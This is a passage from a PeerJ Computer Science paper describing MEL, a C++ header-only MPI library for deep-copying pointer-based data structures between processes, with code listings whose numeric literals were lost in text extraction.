(myvar.somevec.size() > ) { mpi_send(&(myvar.somevec[ ]), myvar.somevec.size(), mpi_int, dst_rank, tag, comm); } //---------------------------------------------------// // on receiving process somestruct myvar; mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // if myvar goes out of scope we segfault! //myvar.somevec.clear(); // segfault! //myvar.somevec.resize( ); // segfault! //myvar.somevec.reserve( ); // segfault! //myvar.somevec = std::vector<int>();// segfault! whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // etc... // it is safe to access .size() of the vector even if its internal // pointer is invalid, we can use this to create a new vector in // place, and to determine if we need to receive data. // force a new vector to be constructed at the memory address of the // existing one without calling the existing vector's destructor. new (&(myvar.somevec)) std::vector<int>(myvar.somevec.size()); // resolve the dependency of the struct if (myvar.somevec.size() > ) { mpi_recv(&(myvar.somevec[ ]), myvar.somevec.size(), mpi_int, src_rank, tag, comm); } buffered vs. non-buffered so far we have discussed methods for deep copying object types by recursively traversing the data-structure and performing discrete message operations to resolve each dependency. while often small there is a performance cost associated with beginning and ending a communication between processes, and this cost is exacerbated when communication occurs between processes on different physical nodes connected by a network interface. in many cases it is beneficial to pack a deep structure into a contiguous buffer on the sending process and to transport it as a single communication, the buffer can then be received and unpacked to reconstruct the target data structure. listing demonstrates a variant on listing where data is packed into a buffer before being transported and unpacked on the receiving process. while buffered deep copy enables greater performance when communicating large structures made up of many small objects between processes, this speed comes at the cost of increased code complexity and limitations on the size of data that can be transferred. in the scenario where the data to be deep copied occupies more than half of the available system memory buffering into a contiguous buffer is no longer applicable as there is no remaining space in memory to allocate the buffer. additionally, for programs that make many small allocations and de-allocations during normal execution system memory can become fragmented, leading to a situation where there is more than enough available memory to allocate the buffer but it is split up in many small pieces meaning no one contiguous allocation can be made. in these scenarios there is no alternative but to perform a non-buffered deep copy to move the data. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing user example–hand coded buffered deep copy using a dangling pointer from the sending process to determine if data needs to be unpacked. struct somestruct { int *ptr = nullptr, len = ; }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // calculate buffer size and allocate space int buffer_size = sizeof(somestruct); if (myvar.ptr != nullptr && myvar.len > ) { buffer_size += (sizeof(int) * myvar.len); } char *buffer, *pos; mpi_alloc_mem(buffer_size, mpi_info_null, &buffer); pos = buffer; // pack the struct itself to move non-deep members memcpy(pos, &myvar, sizeof(somestruct)); pos += sizeof(somestruct); // pack the array of the struct if (myvar.ptr != nullptr && myvar.len > ) { memcpy(pos, myvar.ptr, sizeof(int) * myvar.len); pos += sizeof(int) * myvar.len; } // send the buffer mpi_send(buffer, buffer_size, mpi_byte, dst_rank, tag, comm); // free the buffer mpi_free_mem(buffer); //---------------------------------------------------// whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // on receiving process somestruct myvar; // calculate buffer size and allocate space mpi_status status; mpi_probe(src_rank, tag, comm, &status); int buffer_size; mpi_get_count(&status, mpi_byte, &buffer_size); char *buffer, *pos; mpi_alloc_mem(buffer_size, mpi_info_null, &buffer); pos = buffer; // receive the buffer mpi_recv(buffer, buffer_size, mpi_byte, src_rank, tag, comm); // unpack the struct itself to move non-deep members memcpy(&myvar, pos, sizeof(somestruct)); pos += sizeof(somestruct); // unpack the array of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); memcpy(myvar.ptr, pos, sizeof(int) * myvar.len); pos += sizeof(int) * myvar.len; } // free the buffer mpi_free_mem(buffer); buffering may also perform worse than non-buffered methods when the data to be deep copied consists of a small number of large objects, such as a struct containing several pointers to large buffers. in this case it may be detrimental to force the local copying of the large buffers into a single message only to unpack them on the receiving process when it would have been faster to transport them separately while taking the hit on the overheads associated with setting up multiple communications. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel–the mpi extension library mel is a c++ , header-only library, being developed with the goal of creating a lightweight and robust framework for building parallel applications on top of mpi. mel is designed to introduce no (or minimal) overheads while drastically reducing code complexity. it allows for a greater range of common mpi errors to be caught at compile- time rather than during program execution when it can be far more difficult to debug. a good example of this is type safety in the mpi standard. the standard does not dictate how many of the object types should be implemented leaving these details to the implementation vendor. for instance, in intel mpi . mpi_comm objects and many other types are implemented as integer handles, typedef int mpi_comm, to opaque data that are managed by the mpi run-time. a drawback with this approach is it causes compile time type-checking of function parameters to not flag erroneous combinations of variables. the common signature mpi_send(void*, int, mpi_datatype, int, int, mpi_comm) is actually seen by the compiler as mpi_send(void*, int, int, int, int, int), allowing any ordering of the last five variables to be compiled as valid mpi code, while potentially causing catastrophic failure at run-time. in contrast, open mpi . . implements these types as structs which are inherently type-safe. with mel we aim to: � remain true to the underlying design of mpi, by keeping to an imperative function interface that does not fundamentally change the way in which the programmer interacts with the mpi run-time. � to provide a type-safe, consistent, and unified function syntax that allows distributions of mpi from all vendors to behave in a common and predictable way at both compile- time and run-time. � to be soluble, allowing the compiler to remove the abstractions mel provides to achieve the same performance as native mpi code. � to be memory efficient by minimizing the use of intermediate buffers whenever possible. � to make use of modern c++ language features and advanced template meta programming to both ensure correctness at compile-time and to generate boiler-plate values that programmers have to provide themselves with native mpi code. � to give higher-level functionality that is not available from the mpi standard such as deep copy semantics (our focus in this paper). mel deep copy our algorithm is implemented in four parts, a top-level interface of functions for initiating deep copy as send/receive, broadcast, or file-io operation; a transport api of functions that describe how data is to be moved within a deep copy operation, a set of transport methods that describe generically how to move a region of memory; and a hash-map interface for tracking which parts of the data structure have already been traversed. figure shows the architecture of our algorithm. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to ensure correct memory management for deep structures the user must adhere to: � unallocated pointers are initialized to nullptr. � dynamic memory must be allocated using mpi_alloc_mem and freed using mpi_free_mem, or the equivalent mel calls: t* mel::memalloc<t>(int len) t* mel::memalloc(int len, t &value) void mel::memfree(t *ptr) t* mel::memconstruct<t>(args &&...args) void mel::memdestruct(t *ptr, int len = ) � pointers refer to distinct allocations. e.g. it is erroneous to have an allocation of the form char *ptr = new char[ ] in one object, and to then have a weak-pointer into the array in subsequent objects: char *mysubptr = &ptr[ ]. in these situations, it is best to store integer offsets into the array, rather than the pointer address itself. top-level interface the top-level interface for our algorithm (listing ) consists of functions for initiating a deep copy as a send, receive, broadcast, or file access operation on a templated pointer (t*), a pointer-length pair (t*, len), an object reference (t&), or an stl container (std::vector<t>&, std::list<t>&). in the case of receiving methods (recv, bcast, and fileread) the len parameter can either be passed by reference so that it can be modified to reflect the number of elements that were actually received, or captured from an integer literal or constant variable to provide a run-time assertion whether the correct number of elements were received. all methods are blocking and do not return until the entire data-structure has been transferred. buffered variants of the top-level interface initiate a local deep copy to a contiguous buffer on the sender, this buffer is then sent as a single transport to the receiving processes where it can be unpacked. by decreasing the number of mpi communications or file figure mel deep copy architecture. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accesses needed to transfer a deep structure significant reductions in latency can be achieved, at the cost of added memory overhead from packing and unpacking data before and after transport. in general, large structures of small objects (i.e. a tree with many nodes that are small in memory) benefit most from buffering while smaller structures of large objects (i.e. a struct containing large arrays) tend to benefit from non-buffered transport. another motivating reason for providing a non-buffered mechanism for deep copy is the scenario where the deep structure occupies more than half of the available system memory. in such cases it is not possible to make a single contiguous allocation large enough to pack the structured data. an example of where this can happen is the use of mpi to distribute work to banks of intel xeon phi coprocessors which are exposed to the host system via a virtual network interface. while such hardware provides a large number of physical processor cores ( ) on card memory is reduced ( – gb). on larger systems with more available memory this is less likely to occur although the use of non-buffered methods may still be desirable for the reasons outlined above; and in any case, achieving low memory overhead is good practice. detecting objects that require deep copy determining whether a given object is “deep” or not is performed at compile time using c++ template meta-programming to detect the presence of a member function of the form template<typename msg> void deepcopy(msg &msg) that describes how to resolve the dependencies of a given object type. the template parameter msg is a shorthand for mel::deep::message<transport_method, hash_map> where transport_method and hash_map are types satisfying the constraints described in sections transport method and hashing shared pointers, respectively. a detailed example of the method used to detect the presence of a matching member function is given in section detecting the deep copy function using template meta-programming. the use of template meta-programming in c++ allows for the complete set of possible copy operations needed to transport a structure to be known at compile time, allowing the compiler to make optimizations that might otherwise not be possible if inheritance and virtual function calls were used. template programming also opens up the future possibility of using more advanced c++ type_traits such as std::is_pod<t> (is-plain-old-data) and other similar type traits to help make informed decisions about how best to move types automatically at compile time. listing mel implementation–mel deep copy top-level interface. // calculate buffer size needed to pack an object or array of objects. int mel::deep::buffersize(t &obj) int mel::deep::buffersize(t *&ptr) int mel::deep::buffersize(t *&ptr, const int len) int mel::deep::buffersize(stl &container) // ^ stl can (currently) be std::vector, std::list whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // mpi_send void mel::deep::send(t &obj, const int dst, const int tag, const mel::comm &comm) void mel::deep::send(t *&ptr, ...) void mel::deep::send(t *&ptr, const int len, ...) void mel::deep::send(stl &container, ...) // mpi_recv void mel::deep::recv(t &obj, const int src, const int tag, const mel::comm &comm) void mel::deep::recv(t *&ptr, ...) void mel::deep::recv(t *&ptr, int const &len, ...) // ^ len matches int literals and constants - runtime assertion // on number of received elements void mel::deep::recv(t *&ptr, int &len, ...) // ^ len matches int variables by reference - gets set to the // number of received elements void mel::deep::recv(stl &container, ...) // mpi_broadcast void mel::deep::bcast(t &obj, const int root, const mel::comm &comm) void mel::deep::bcast(t *&ptr, ...) void mel::deep::bcast(t *&ptr, int const &len, ...) // ^ len matches int literals and constants - runtime assertion on // number of received elements void mel::deep::bcast(t *&ptr, int &len, ...) // ^ len matches int by reference - set on receivers to the number // of received elements void mel::deep::bcast(stl &container, ...) // stl file streams void mel::deep::filewrite(t &obj, std::ofstream &file) void mel::deep::fileread(t &obj, std::ifstream &file) // mpi_file void mel::deep::filewrite(t &obj, mel::file &file) void mel::deep::fileread(t &obj, mel::file &file) // overloads for buffered methods follow the same pattern void mel::deep::bufferedsend(t &obj, ...) void mel::deep::bufferedsend(t &obj, ..., const int buffersize) whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // ^ source process can specify the buffer size to allocate for // packing the structure void mel::deep::bufferedrecv(t &obj, ...) // ^ buffer size on the recieving processes is determined from the // sender void mel::deep::bufferedbcast(t &obj, ...) void mel::deep::bufferedbcast(t &obj, ..., const int buffersize) // ^ buffer size only used on sender, ignored on receiving // processes void mel::deep::bufferedfilewrite(t &obj, ...) void mel::deep::bufferedfilewrite(t &obj, ..., const int buffersize) void mel::deep::bufferedfileread(t &obj, ...) because we use the same function for sending/receiving, buffered/non-buffered, and for point-to-point/collective/ or file access communications we make use of a utility type, message, that tracks which operation is being performed and where data is coming from or going to. the message object is created internally when one of the top-level functions is called and remains unmodified throughout the deep copy. message transport-api the deep copy function declares to our algorithm how data dependencies of a type need to be resolved in order to correctly rebuild a data structure on the receiving process. to keep the definition of this function simple the message object exposes a small api of functions (listing ) that abstract the details of how data is sent and received between processes. listing mel implementation–message transport-api. // transfer a deep object. only needed for deep types! // non-deep members are transported automatically void message::packvar(t &obj) // transfer a deep/non-deep pointer to len objects void message::packptr(t *&ptr, int len = ) // transfer a deep/non-deep pointer to len objects where the // pointer may also be referenced in whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // other parts of the deep structure. (i.e. a graph structure // where multiple nodes point to a shared neighbour) void message::packsharedptr(t *&ptr, int len = ) // transfer a std::vector of deep/non-deep objects. void message::packstl(std::vector<t> &vec) // or a std::list (doubly linked list). void message::packstl(std::list<t> &lst) // or use the shorthand operators message& message::operator&(t &obj) // <- calls packvar which is // only defined for deep types message& message::operator&(std::vector<t> &vec) message& message::operator&(std::list<t> &lst) // only used in top level interface functions, these variants differ // only from their standard counterparts (above) in that they do not // assume the parent object has been transported as for the root // object there is no parent. void message::packrootvar(t &obj) void message::packrootptr(t *&ptr, int len = ) void message::packrootstl(std::vector<t> &vec) void message::packrootstl(std::list<t> &lst) listing gives an example usage of the message transport api to move a complex data-structure. all of the functions provided work transparently with both deep and non- deep types, with the exception of message::packvar which is intended only for the transport of deep types as non-deep member variables will be transported automatically. by comparison, boost serialization library requires that all types except for language defined base types (i.e. int, bool, double) provide serialization functions regardless of whether they contain deep members, and that all member variables within the type (including non-deep members) are explicitly registered with the archive object. listing mel implementation–registering dependencies using the transport-api. struct somedeepstruct { // non-deep members will be copied automatically. int a, b, c, len; someflatstruct d; // deep members must be declared in the deep-copy function anotherdeepstruct e, f, g; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ char *myarray = nullptr; graphnode *mysharedpointer = nullptr; std::vector<int> v; std::vector<anotherdeepstruct> w; template<typename msg> void deepcopy(msg &msg) { // pack a deep object by reference. msg.packvar(e); // a lighter syntax for non-pointer members. msg & f & g; // transfer a char array of len elements. msg.packptr(myarray, len); // transfer a shared pointer that may also be used // elsewhere in the structure. msg.packsharedptr(mysharedpointer); // transfer a std::vector. msg.packstl(v); // we can also transfer a std::vector or std::list // using & syntax. msg & w; // in fact, we can simply replace all of the above // code (in this function) with: msg & e & f & g & v & w; msg.packptr(myarray, len); msg.packsharedptr(mysharedpointer); } }; an example copy in essence, the deep copy algorithm works by both sending and receiving processes entering a message loop or handshake with one another where they both expect to keep sending and receiving data until the entire structure has been transferred. the sending process determines how much data is to be sent, and this information is conveyed to the receiving processes transparently in such a way that when a receiving process determines there is nothing left to receive the sending process has returned. listing shows an example of using the deep copy function to move an array of non- deep objects. because the type, int, does not provide a member function for deep copy whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the footprint of the array is sent in a single mpi message. on the receiving process memory is allocated into the pointer provided and the data is received. listing user example–mel deep copy of non-deep type. // on sending process int len = ; int *ptr = mel::memalloc<int>(len); // fill ptr with some values... ptr = [ ..len) for (int i = ; i < len; ++i) ptr[i] = i; mel::deep::send(ptr, len, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process int len; int *ptr = nullptr; mel::deep::recv(ptr, len, src_rank, tag, comm); // len = and ptr now equals an address to len integers // ptr = [ ..len) an example of moving an array of structs containing pointers to dynamically allocated memory is given in listing . in order to correctly reconstruct the data on receiving processes a deep copy function has been implemented which tells the algorithm to copy a char array containing len elements. because the type has a deep copy function the receiving processes will allocate the memory for the array of structs and copy the footprint of the array as a single contiguous chunk resulting in non-deep member variables being transferred automatically. the receiving process makes the necessary allocations to receive its dependencies. both sending and receiving processes will then loop over each element in their array and call the objects deep copy function to resolve its data dependencies. if the struct contained variables which themselves required a deep copy the algorithm would recurse on them until all dependencies are resolved. in this simple case, however, the struct contains a char array which does not require a deep copy and as such the sub-array is transferred by allocating the needed memory and copying the entire sub-array as one contiguous chunk, as in listing . listing user example–mel deep copy of deep type. struct somestruct { int len; char *array = nullptr; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ template<typename msg> void deepcopy(msg &msg) { msg.packptr(array, len); } }; //---------------------------------------------------// // on sending process allocate array and subarrays int len = ; somestruct *ptr = mel::memalloc<somestruct>(len); for (int i = ; i < len; ++i) { // allocate sub array ptr[i].len = i + ; ptr[i].array = mel::memalloc<char>(ptr[i].len); // fill ptr[i].ptr with some values... ptr_i = [ ..len) for (int j = ; j < ptr[i].len; ++j) ptr[i].array[j] = j; } mel::deep::send(ptr, len, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process int len; somestruct *ptr = nullptr; mel::deep::recv(ptr, len, src_rank, tag, comm); // len = and ptr equals an address to an array of structures // each having their respective lengths and subarrays // ptr = [ .. ) : { [ .. ), [ .. ), [ .. ), [ .. ), [ .. ) } transport method the message object represents how our algorithm traverses the deep structure and ensures that both sending and receiving processes independently come to the same conclusion on what order objects are traversed in with minimal communication. this traversal order is independent of, and identical for all deep copy operations. because of this we template the message object on a type that represents the specific nature of the data transportation we want to perform (i.e. message<transportsend> to perform deep copy as an mpi_send communication), allowing the same traversal scheme to be reused. as a part of our implementation we provide transport methods for a wide variety of data movement scenarios: whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transportsend performs each transport call as a discrete mpi_send communication. transportrecv performs each transport call as a discrete mpi_recv communication. transportbcastroot performs each transport call as a discrete mpi_bcast com- munication, as a sender. transportbcast performs each transport call as a discrete mpi_bcast com- munication, as a receiver. transportfilewrite performs each transport call as a discrete mpi_filewrite operation. transportfileread performs each transport call as a discrete mpi_fileread operation. transportstlfilewrite performs each transport call as a discrete std::ofstream:: write. transportstlfileread performs each transport call as a discrete std::ifstream:: read. transportbufferwrite performs each transport call as a discrete std::memcpy to a contiguous memory buffer. transportbufferread performs each transport call as a discrete std::memcpy from a contiguous memory buffer. notransport this transport method acts as a sender but does not move any data. this method is used to implement the top-level interface functions for mel::deep::buffersize which counts how many bytes need to be moved without performing any transportation. adding additional transport methods is as simple as implementing a class with a public-member function of the form template<typename t> inline void transport(t *&ptr, const int len) that describes how to move a region of memory, and a public-static-member variable static constexpr bool source which tells the compiler whether or not this is a sending or a receiving transport method. this boolean is important as it tells the message object whether or not it needs to make allocations as it traverses the deep structure. the transport method should also store any state variables need to maintain the transport over the duration of the deep copy. such state variables may be but are not limited to an mpi communicator and process rank, a file handle, or a pointer to an array used for buffering. hashing shared pointers when considering large structured data containing duplicate pointers the method used to track which parts of the structure have already been transported can have a significant impact on the traversal time. a hash-map is a natural choice for representing an unordered map between two pointers as it is efficient for random access lookups and insertions. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as with the transport method, the message object is also templated on the hash-map to use for pointer tracking, namely message<transport_method, hash_map = mel:: deep::pointerhashmap>. this allows for the user to provide an adapter to their own implementation of a hash-map specifically optimized for pointers or to provide an adapter type to a third-party hash-map implementation. to use a custom hash-map with any of the top-level functions simply override the default template parameter when initiating a deep copy operation. e.g. mel::deep:: send<int, mycustomhashmap>(ptr, len, dst, tag, comm); where mycustomhashmap exposes public-member functions of the form: template<typename t> inline bool find(t* oldptr, t* &ptr) template<typename t> inline void insert(t* oldptr, t* ptr) these functions are templated on the pointer type, t*, so that user provided hash-map adapters are able to use this extra type information to optimize hashing if needed. external deep copy functions so far we have discussed the use of deep copy functions and the transport api in cases where the deep copy function was a local member function of the type being considered. in some use cases, a structure may be defined in headers or libraries that cannot be modified easily (or at all). in such cases, we still would like to be able to define the deep copy semantics for the type without directly modifying its implementation. to enable this, we provide an overload of all the functions in the transport api and top-level interface that take an additional template parameter that is a handle to a global-free- function of the form template<typename msg> inline void mytypedeepcopy(mytype &obj, msg &msg) that takes by reference an instance of the object to transport and a message object to perform the deep copy. listing , shows the usage of external free deep copy functions with types needing deep copy. structb contains an internal member function for performing deep copy, while structa does not. passing an instance of structa to the top-level interface will result in incorrect results as its dependencies will not be resolved. by implementing a global-free- function that defines the deep copy requirements of structa, we can then tell the top-level interface to explicitly use that function to resolve external dependencies of the type. if we provide an external free function for structb which already has an internal deep copy function, the internal function is ignored and the free function explicitly given is used. listing user example–using external global-free-functions for deep copy. struct structa { std::vector<int> arr; }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ struct structb { std::list<int> lst; // internal - local member deep-copy function template<typename msg> void deepcopy(msg &msg) { msg & lst; } }; // external - global free deep-copy function template<typename msg> void structa_deepcopy(structa &obj, msg &msg) { msg & obj.arr; } // external - global free deep-copy function template<typename msg> void structb_deepcopy(structb &obj, msg &msg) { msg & obj.lst; } // example usage: structa sa; mel::deep::send(sa, dst, tag, comm); // ^ error! structa contains a std::vector but does not // have a deep-copy function mel::deep::send<structa, mel::deep::pointerhashmap, structa_deepcopy>(sa, dst, tag, comm); // ^ correct. uses external free function to perform the deep-copy structb sb; mel::deep::send(sb, dst, tag, comm); // ^ correct. uses internal member function to perform the deep-copy mel::deep::send<structb, mel::deep::pointerhashmap, structb_deepcopy>(sb, dst, tag, comm); // ^ correct. uses external free function (overrides // internal function) to perform the deep-copy whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the same rules apply for providing external free functions to the transport api. listing , shows an example of this, where once again structa is a deep type that does not provide an internal deep copy function. structc is also deep and contains a std::list of structa. if the deep copy function of structc simply calls the ampersand operator or message:: packstl function (listing , lines , ) to transport the std::list then the instances of structa will be transported incorrectly as a non-deep type. in the same manner as with the top-level interface the free function to use to deep copy structa is given explicitly to message::packstl so that it can correctly resolve the dependencies of the deep structure. listing user example–using external global-free-functions for deep copy with the transport-api. struct structa { std::vector<int> arr; }; // external - global free deep-copy function template<typename msg> void structa_deepcopy(structa &obj, msg &msg) { msg & obj.arr; } struct structc { std::list<structa> lst; // internal - local member deep-copy function template<typename msg> void deepcopy(msg &msg) { //msg & lst; // <- error - structa has no internal // deep-copy function //msg.packstl(lst); // <- error msg.packstl<structa, structa_deepcopy>(lst); // <- correct } }; // example usage: structc sc; mel::deep::send(sc, dst, tag, comm); // ^ correct. uses internal member function of structc and the // external free function structa_deepcopy for structa. the option to use external deep copy functions gives our method flexibility when we need to add deep copy semantics to code that cannot be directly, or easily modified. however, this does not mean it will always be applicable as it requires intimate and low- level knowledge of the object’s internal implementation and methods of allocation. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel implementation details in the following section we provide a detailed discussion of the implementation of the mel deep copy algorithm. detecting the deep copy function using template meta-programming to detect whether the type under consideration contains a deep copy function we make use of sfinae (substitution failure is not an error) to create a compile-time boolean test for the existence of a member function with the desired signature. we encapsulate the usage of this method into a templated shorthand that uses std::enable_if to give us a clean and concise method for providing function overloads for deep and non-deep types. listing , shows an implementation of the technique used to conditionally detect member functions of template types at compile time. the overloads of void somefunc (t &obj) for when t is or is not a type with a deep copy function allows us specialize our implementation for deep types while allowing them to share identical function signatures. listing mel implementation–detecting the deep copy function. template<typename t> struct hasdeepcopymethod { // this pseudo-type does not exist unless type u has a member // function of the desired form: // template<typename msg> void deepcopy(msg &msg) template<typename u, void(u::*)(mel::deep::message <notransport>&)> struct sfinae {}; // if this succeeds test<t> will be a function that returns char template<typename u> static char test(sfinae<u, &u::deepcopy>*); // otherwise test<t> will return an int template<typename u> static int test(...); // we can now test if type t has the desired member function by // seeing if the result is the size of a char or an int. static const bool value = sizeof(test<t>( )) == sizeof(char); }; // shorthands for when implementing functions template<typename t, typename r = void> using enable_if_deep = typename std::enable_if< hasdeepcopymethod<t>::value, r>::type; template<typename t, typename r = void> using enable_if_not_deep = typename std::enable_if <!(hasdeepcopymethod<t>::value), r>::type; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // example usage in function definitions template<typename t> enable_if_deep<t> somefunc(t &obj) { std::cout << "called with deep type!" << std::endl; } template<typename t> enable_if_not_deep<t> somefunc(t &obj) { std::cout << "called with non-deep type!" << std::endl; } // a deep type struct structa { template<typename msg> void deepcopy(msg &msg) {} }; structa sa; somefunc(sa); // called with deep type! int i; somefunc(i); // called with non-deep type! transport-api implementation next we describe the implementation of the transport api which specifies the traversal order our algorithm uses when performing deep copy. message::packvar the message::packvar function will call the deep copy function of the given variable to resolve its dependencies. this function works on the assumption that local member variables of the object have already been transported when the parent object was traversed. it is for this reason that message::packvar is only defined for deep types, as a non-deep type will have been transported automatically with the parent. in all of the following listings for the implementations of the transport api the overloads for non-deep types have been omitted for space. listing mel implementation–message::packvar. // transport a deep object template<typename d> inline enable_if_deep<d> message::packvar(d &obj) { // assumes that the footprint of obj has already been transported obj.deepcopy(*this); // *this == the message object } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packptr when transporting dynamically allocated memory special care must be taken to correctly allocate memory on the receiving processes. listing shows the implementation of message::packptr for deep types. this function offloads its work to the transportalloc helper function of the message object. on receiving process, transportalloc will make an allocation of len elements of the given type before receiving the data. on the sending process, transportalloc is identical to transport and simply moves the requested data. for a deep type, message::packptr will then loop over all the received elements and call their deep copy functions to resolve any dependencies. listing mel implementation–message::packptr. // transport a deep pointer to len objects template<typename d> inline enable_if_deep<d> message::packptr(d *&ptr, int len = ) { // on sender - if (len > ) and (ptr != nullptr) send the memory // // on receiver - if (len > ) and (ptr != nullptr) then overwrite // the dangling ptr with a new allocation of len elements and // receive the memory transportalloc(ptr, len); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } message::packsharedptr in complex structured data there is often a requirement for data to be self referencing. that is, one part of the deep structure may be pointed to from multiple other points within the structure. in these situations, a naı̈ve deep copy algorithm would traverse the shared object within the structure multiple times allocating a unique copy of it with each visit. if the shared object is deep itself and points to one of its ancestors within the structure, then the deep copy algorithm will become stuck in an infinite cycle within the data, allocating new memory with each loop. to avoid this and to allow complex self-referential data to be transported, we provide the message::packsharedptr function shown in listing . this method checks the given pointer against a hash-map of type (pointer / pointer) to determine if the pointed to memory has already been transported. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing mel implementation–message::packsharedptr. // transport a deep shared pointer to len objects template<typename d> inline enable_if_deep<d> message::packsharedptr(d *&ptr, int len = ) { // save the original pointer in case we modify it d *oldptr = ptr; // is the given pointer already in the hash-map? // if so, set ptr equal to the pointer stored in the hash-map and // return if (pointermap.find(oldptr, ptr)) return; // same as for packptr transportalloc(ptr, len); // insert the (newly allocated, on receiver) ptr into the hashmap // with the original dangling pointer (from the sender) as the key pointermap.insert(oldptr, ptr); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } during deep copy, the first time a shared pointer is passed to message:: packsharedptr on both the sending and receiving processes, it is transported in the same manner as in message::packptr by calling transportalloc. on the sending process, the pointer is then inserted into the hash-map so it can be ignored if it is visited again. on the receiving processes, the call to transportalloc will have caused the dangling pointer from the sender to have been overwritten with the newly allocated pointer. this new pointer is inserted into the hash-map with the original (dangling) pointer as the key, so that next time the receiver is asked to transport the same dangling pointer it can simply lookup and return the existing allocation. when a shared pointer that has already been visited is passed to message:: packsharedptr and it is found within the hash-map then sending process can simply return as no memory needs to be transported; the receiving process uses the dangling pointer passed to it to retrieve the valid pointer that was previously allocated and transported the last time the shared pointer was visited. all interaction with the hash-map is performed through the pointermap.find and pointermap.insert functions of the message object. these functions are further discussed in section hash-map implementation. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a nice property of this scheme is that the hash-map is never communicated and is constructed independently on both the sending and receiving processes. this means that for non-buffered communications the sender and receiver can traverse the structure in parallel (lock-step), and for buffered communications or buffered/non-buffered file- access the processes can traverse the structure independently. message::packstl as part of the transport api, we provide helper functions for moving common c++ stl containers. listing shows the implementation of message::packstl for c++ std:: vector’s of both deep and non-deep types. this is very similar to the implementation of message::packptr discussed previously with the slight difference that instead of making a new allocation on the receiving processes via transportalloc we instead repair the internal pointer of the given std::vector by calling the placement-new operator to recreate the vector in place (as discussed in listing ). the implementations of message:: packstl for other stl containers is conducted in the same way and is omitted here. listing mel implementation–message::packstl for std::vector. // transport a std::vector of deep types template<typename d> inline enable_if_deep<d> packstl(std::vector<d> &obj) { // std::vector::size() is safe to access even if the internal // pointer is invalid int len = obj.size(); // if this is a recieving process then we need to repair the // dangling internal pointer if (!transport_method::source) { // std::vector forces construction of elements new (&obj) std::vector<d>(len, d()); // we need to call the destructor explicitly in case any //resources were acquired upon default construction of each // element. for (int i = ; i < len; ++i) (&obj[i])->~d(); } d *p = &obj[ ]; if (len > ) transport(p, len); // followed by the recursion for deep types for (int i = ; i < len; ++i) { obj[i].deepcopy(*this); } } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packrootvar, message::packrootptr, & message::packrootstl finally, we provide a set of functions to simplify the implementation of the top- level interface. recall that message::packvar is only defined for deep types and assumes that the object’s footprint is always transported with the parent object. this is not the case for the top-level functions as no parent has been transported; in this case we must explicitly transport the object footprint regardless of whether it is deep or not. a similar scenario occurs for pointers passed to the top-level interface. in order to avoid duplicating all of the top-level functions to account for whether the root pointer is shared we always insert it into the hash-map as this is a small constant overhead that does not affect performance. recall from the implementation of message::packsharedptr that on the receiving processes the dangling pointer from the sender is used as the key into the hash-map. because of this, for the root pointer we must explicitly transport the address-value of the pointer from the sender to the receiving processes so they can insert it into their hash-maps. finally, when considering stl containers passed to the top-level interface, receiving processes cannot query .size() of the container as its footprint was not previously transported. instead, we explicitly transport the size of the container and call .resize() on the receiving processes. listing mel implementation–message::packrootvar, message::packrootptr, & message:: packrootstl. // transport the footprint of a non-deep object template<typename t> inline enable_if_not_deep<t> 